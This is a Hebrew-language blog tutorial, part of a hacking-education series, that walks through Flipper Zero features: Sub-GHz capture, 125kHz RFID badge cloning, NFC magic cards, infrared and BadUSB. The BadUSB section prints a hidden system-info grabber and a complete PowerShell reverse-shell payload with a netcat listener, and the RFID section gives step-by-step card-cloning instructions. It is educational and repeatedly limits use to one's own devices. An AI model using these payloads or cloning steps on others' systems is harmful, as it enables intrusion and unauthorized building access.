תפריט
דף הבית מאמרים {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} אודות עבדו איתי
Circuit board close-up
אבטחה מרץ 6, 2026 • 22 דקות קריאה

Flipper Zero Mastery: Every Protocol, Every Trick

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

שתפו:
Lee Foropoulos

Lee Foropoulos

22 דקות קריאה

Continue where you left off?
Text size:

Contents

The Hacker's Path: סדרה בת 5 חלקים

חלק 1: מבואחלק 2: שליטה ב-Flipperחלק 3: יסודות Kaliחלק 4: ניצולחלק 5: הביקורת המלאה

בחלק 1, עשיתם את הצעדים הראשונים. שכפלתם שלטי IR, סרקתם כרטיסי NFC, צפיתם בספקטרום ה-sub-GHz מאיר ותקלדתם "Hello World" עם BadUSB. ראיתם שאבטחה היא לעתים קרובות אשליה.

עכשיו נכנסים לעומק. בסוף המאמר הזה, תבינו כל פרוטוקול עיקרי שה-Flipper Zero שלכם יכול לתקשר איתו, לא רק איך להשתמש בהם, אלא למה הם עובדים ככה ומה זה אומר לאבטחה.

אזהרה הוגנת: אתם עומדים לגלות שכמה דברים שהנחתם שהם מאובטחים... לא מאובטחים.

הפילוסופיה של Flipper

לפני שנצלול לפרוטוקולים, בואו נקבע את הגישה הנכונה. ה-Flipper Zero הוא לא "מכשיר פריצה" במובן ההוליוודי. הוא כלי למידה שמאפשר לכם לתקשר עם תדרי רדיו ופרוטוקולי חומרה שבדרך כלל בלתי נראים.

חשבו עליו כזכוכית מגדלת לאותות אלחוטיים. האותות תמיד היו שם. פשוט לא יכולתם לראות אותם. עכשיו אתם יכולים.

רוב ה"אבטחה" מסתמכת על ערפול, על ההנחה שתוקפים לא ידעו איך לתקשר עם מערכת. ה-Flipper שלכם מסיר את הערפול הזה.

⚠️ תזכורת: רק הדברים שלכם

הכל במאמר הזה מיועד לבדיקת המכשירים, הכרטיסים והמערכות שלכם בלבד. הטכניקות עובדות על הדברים של כל אחד, זה הנקודה. אבל שימוש בהם על מערכות שאינן שלכם הוא בלתי חוקי.

Sub-GHz: הספקטרום הבלתי נראה

תדרי רדיו תת-גיגהרץ נמצאים בכל מקום. דלת המוסך, שלט הרכב, תחנת מזג האוויר, הפעמון האלחוטי, חיישני לחץ צמיגים, מכשירי בית חכם, כולם משדרים כל הזמן בתדרים מתחת ל-1 GHz.

נוף התדרים

  • 315 MHz: צפון אמריקה: דלתות מוסך ישנות, שלטי רכב
  • 390 MHz: צפון אמריקה: דלתות מוסך, כלי רכב מסוימים
  • 433.92 MHz: עולמי: תחנות מזג אוויר, חיישנים, מכשירים אירופיים, מוצרי IoT רבים
  • 868 MHz: אירופה: בית חכם, LoRa, מוני שירותים
  • 915 MHz: אמריקה: LoRa, בית חכם, תעשייתי

פרויקט: נתחו את דלת המוסך שלכם

זמן: 15 דקות

מה תלמדו: ההבדל בין קודים סטטיים לקודים מתגלגלים, ולמה זה חשוב

שלבים:

  1. נווטו ל-Sub-GHz → Read
  2. עמדו ליד המוסך
  3. לחצו על כפתור השלט של המוסך
  4. צפו ב-Flipper לוכד את האות
  5. בדקו מה נלכד

מה אתם עשויים לראות:

  • Princeton, Linear, Chamberlain (ישן): קודים סטטיים. אותו קוד כל פעם. פגיע להתקפות חזרה.
  • KeeLoq, Security+ 2.0, Rolling Code: קודים מתגלגלים. כל שידור משתמש בקוד אחר מרצף מסונכרן.

קודים מתגלגלים בהסבר

דלתות מוסך ושלטי רכב מודרניים משתמשים בקודים מתגלגלים. ככה הם עובדים:

  1. המשדר והמקלט חולקים seed סודי ואלגוריתם
  2. כל לחיצת כפתור מייצרת את הקוד הבא ברצף מסונכרן
  3. המקלט מקבל את הקוד הנוכחי או כל אחד מ-~256 הקודים הבאים
  4. קוד שנעשה בו שימוש מבוטל לנצח

פרויקט: לכדו נתוני תחנת מזג אוויר

זמן: 10 דקות

מה תמצאו: טמפרטורה, לחות, מצב סוללה, מזהה חיישן, הכל משודר בטקסט גלוי. ללא הצפנה, ללא אימות.

מושג גלי רדיו
ספקטרום הרדיו סביבכם פעיל כל הזמן עם שידורים לא מוצפנים

RFID: עולם ה-125kHz

RFID בתדר נמוך (125kHz) הוא טכנולוגיית כרטיסי קרבה ישנה ופשוטה יותר. תמצאו אותה בכרטיסי חדר כושר, כרטיסי גישה ישנים למשרדים, חניונים ומערכות כניסה לבניינים.

והיא כמעט אוניברסלית נוראית לאבטחה.

איך עובד RFID 125kHz

הכרטיסים האלה פסיביים, אין להם סוללה. כשמחזיקים אחד ליד קורא, השדה האלקטרומגנטי של הקורא מזין את הכרטיס, והכרטיס משדר את מספר הזיהוי שלו. זהו. ללא challenge-response. ללא הצפנה. רק: "אני כרטיס מספר 12345."

סוגי כרטיסים נפוצים

  • EM4100: נפוץ מאוד. משדר פשוט מזהה של 40 ביט. אפס אבטחה.
  • HID Prox: כרטיס הגישה הארגוני הנפוץ ביותר. אפס אבטחה.
  • Indala: פחות נפוץ. אותה בעיה: ללא אבטחה.
  • AWID: גרסה נוספת. אותה חולשה יסודית.

פרויקט: שכפלו את כרטיס חדר הכושר

זמן: 5 דקות

מה תצטרכו: כרטיס ה-125kHz שלכם, כרטיס ריק T5577 ($1-2 ליחידה)

שלבים:

  1. נווטו ל-125 kHz RFID → Read
  2. החזיקו את הכרטיס נגד גב ה-Flipper
  3. המתינו לקריאה מוצלחת
  4. שמרו עם שם מזוהה
  5. לבדיקת אמולציה: Saved → Select Card → Emulate

לכתיבה על T5577 ריק:

  1. לכו לכרטיס השמור
  2. בחרו Write
  3. החזיקו כרטיס T5577 ריק ליד ה-Flipper
  4. המתינו לאישור כתיבה
  5. עכשיו יש לכם שכפול פיזי

נקודה מרכזית

אבטחת RFID 125kHz היא תיאטרון טהור. מערכות אלה מניחות שלא תוכלו לקרוא, להעתיק או לכתוב מחדש נתוני כרטיסים. כל שלוש ההנחות שגויות עם ציוד צרכני שעולה פחות מ-$200.

תקריב של לוח מעגלים
כל פרוטוקול אלחוטי שה-Flipper שלכם נוגע בו חושף הנחות על אבטחה שלעתים רחוקות עומדות בבדיקה

NFC: עולם ה-13.56MHz

NFC בתדר גבוה (13.56 MHz) הוא הדור החדש יותר.

סוגי כרטיסי NFC

  • MIFARE Classic: נפוץ מאוד. הצפנה קניינית שנפרצה לפני שנים. פגיע.
  • MIFARE Ultralight: כרטיסים פשוטים עם אבטחה מינימלית.
  • NTAG: נפוץ בתגיות NFC לאוטומציה.
  • MIFARE DESFire: באמת מאובטח. הצפנת AES.
  • EMV (כרטיסי תשלום): הצפנה חזקה, מגבלות עסקאות וזיהוי הונאה.

פרויקט: נתחו את כרטיס העבודה שלכם

זמן: 10 דקות

18 שנים
מאז שהצפנת MIFARE Classic נפרצה בפומבי ב-2008, ובכל זאת רוב כרטיסי הגישה הארגוניים עדיין מסתמכים עליה.

שכפול UID לעומת שכפול מלא

הבחנה חשובה: ה-Flipper תמיד יכול לקרוא ולאמלט את ה-UID של כרטיס. מערכות מתקדמות בודקות גם UID וגם נתונים מוצפנים.

כרטיסי קסם ל-NFC

  • Gen1 (UID ניתן לשינוי): יכול לכתוב UID מותאם.
  • Gen2 (CUID): תאימות טובה יותר.
  • Gen3 (UFUID): יכול לנעול UID אחרי כתיבה.
  • Gen4 (Ultimate Magic): הגמיש ביותר.

אינפרא-אדום: שליטה מלאה

בניית ספריית השלטים המושלמת

הקושחה Momentum כוללת IRDB, מסד נתונים עצום של שלטים מוקלטים מראש.

פרויקט: בנו את ארסנל ה-IR שלכם

זמן: 20 דקות

לכידת IR גולמית

נווטו ל-Infrared → Learn New → Raw כשהלמידה הסטנדרטית לא מזהה אות.

BadUSB: האלטרנטיבה ל-Rubber Ducky

BadUSB מנצל פגם יסודי: מחשבים סומכים באופן מרומז על מקלדות. ה-Flipper שלכם יכול להקליד כ-1,000 תווים בשנייה.

יסודות DuckyScript

1REM This is a comment
2DELAY 1000
3STRING Hello World
4ENTER
5GUI r
6ALT F4
7CTRL c
8TAB
9DOWNARROW
10ESCAPE

פרויקט: אוסף מידע מערכת

1REM System Info Grabber - Run on YOUR machine only
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -WindowStyle Hidden
6ENTER
7DELAY 1000
8STRING $info = @{
9ENTER
10STRING Hostname = $env:COMPUTERNAME
11ENTER
12STRING Username = $env:USERNAME
13ENTER
14STRING Domain = $env:USERDOMAIN
15ENTER
16STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
17ENTER
18STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
19ENTER
20STRING }
21ENTER
22STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
23ENTER
24STRING exit
25ENTER

פרויקט: הגדרת Reverse Shell

ב-Kali - הפעלת listener:

nc -lvnp 4444

Payload BadUSB (יעד Windows):

1REM Reverse Shell - Replace KALI_IP with your Kali's IP
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
6ENTER

⚠️ ה-Payloads האלה אמיתיים

השתמשו בהם רק על מחשבים שלכם.

Payloads מהנים להדגמות

1REM Rick Roll - Opens YouTube
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
6ENTER
1REM Fake Windows Update - Fullscreen prank page
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://fakeupdate.net/win10ue/
6ENTER
7DELAY 2000
8F11
1REM Flip Screen Upside Down (Windows)
2DELAY 1000
3CTRL ALT DOWNARROW

GPIO: הרחבת חומרה

מודולים חיוניים

  • WiFi Dev Board: מוסיף יכולות WiFi. חיוני מחלק 3.
  • אנטנה חיצונית CC1101: מרחיבה דרמטית את טווח ה-Sub-GHz.
  • ESP32 Marauder: הופך את ה-Flipper לפלטפורמת פריצת WiFi/Bluetooth.
  • ProtoBoard: לפרויקטים מותאמים אישית.

פרויקט: הגדרת WiFi Dev Board

שלבים:

  1. Flash קושחת Marauder ל-ESP32
  2. חברו לפיני GPIO של ה-Flipper
  3. נווטו ל-GPIO → ESP32 → Marauder
  4. עכשיו יש לכם סריקת WiFi, deauth ולכידת חבילות

תכונות Momentum מתקדמות

  • אנימציות שולחן עבודה: קוסמטיות בלבד, אבל כיפיות.
  • פרוטוקולים מורחבים: תמיכה נוספת בפרוטוקולים.
  • מרכז אפליקציות: משחקים, כלים, תוכנות עזר.
  • חבילות נכסים מותאמות: שנו את כל המראה.

מה שיטרתם

עכשיו אתם מבינים:

  • Sub-GHz: איך מתקשרים דלתות מוסך, שלטי רכב וחיישנים
  • RFID 125kHz: למה כרטיסי חדר כושר ותגים ישנים ניתנים לשכפול טריוויאלי
  • NFC 13.56MHz: ההבדל בין הצפנה שבורה (MIFARE Classic) לאבטחה אמיתית (DESFire)
  • אינפרא-אדום: איך לבנות ספריית שלטים אוניברסלית
  • BadUSB: למה אמון USB HID הוא פגיעות יסודית
  • GPIO: איך להתרחב ל-WiFi, טווח מורחב וחומרה מותאמת

ה-Flipper שלכם הוא עכשיו נשק. אבל הוא מברגה בהשוואה ל-Kali Linux, שהוא סדנה שלמה. הגיע הזמן לאתחל את סביבת הפריצה האמיתית.

The Hacker's Path

סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.

חלק 1: מבוא חלק 2: שליטה ב-Flipper ✓ חלק 3: יסודות Kali חלק 4: ניצול חלק 5: ביקורת מלאה

רשימת בדיקה לחלק 2

☐ Sub-GHz: דלת מוסך נותחה, קודים מתגלגלים לעומת סטטיים הובנו

☐ RFID 125kHz: כרטיסים נקראו, לפחות שכפול אחד נבדק

☐ NFC: כרטיס עבודה נותח, סוג כרטיס זוהה

☐ אינפרא-אדום: ספריית שלטים מלאה לבית נבנתה

☐ BadUSB: Payload מידע מערכת נבדק, reverse shell הובן

☐ GPIO: WiFi dev board מוכן לחלק 3

☐ כרטיסי קסם: T5577 ו/או כרטיסי NFC קסם נרכשו לבדיקות

תוכנית פעולה לשליטה ב-Flipper 0/6

מה הלאה

בחלק 3, עוזבים את היכולות הממוקדות של ה-Flipper ונכנסים לסביבת בדיקות חדירה מלאה: Kali Linux.

תלמדו:

  • הקמת מעבדת פריצה (התקנה והגדרת VM)
  • סיור רשת עם nmap
  • סיור אלחוטי: לכידת handshakes WiFi עם aircrack-ng
  • סיור ווב: גילוי מה הנתב שלכם חושף
  • חיבור לכידות Flipper לזרימות עבודה של Kali

נתראה בחלק 3.

How was this article?

שתפו

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Al tachmits af post

Qabel hodaot keshemashmim maamarim chadashim. Lo dorshim email.

Tire banner baatar keshemashmim maamar chadash, vetodaa medafdefan im teashru.

Hodaot defdefan bilvad. Beli spam, beli email.

0 / 0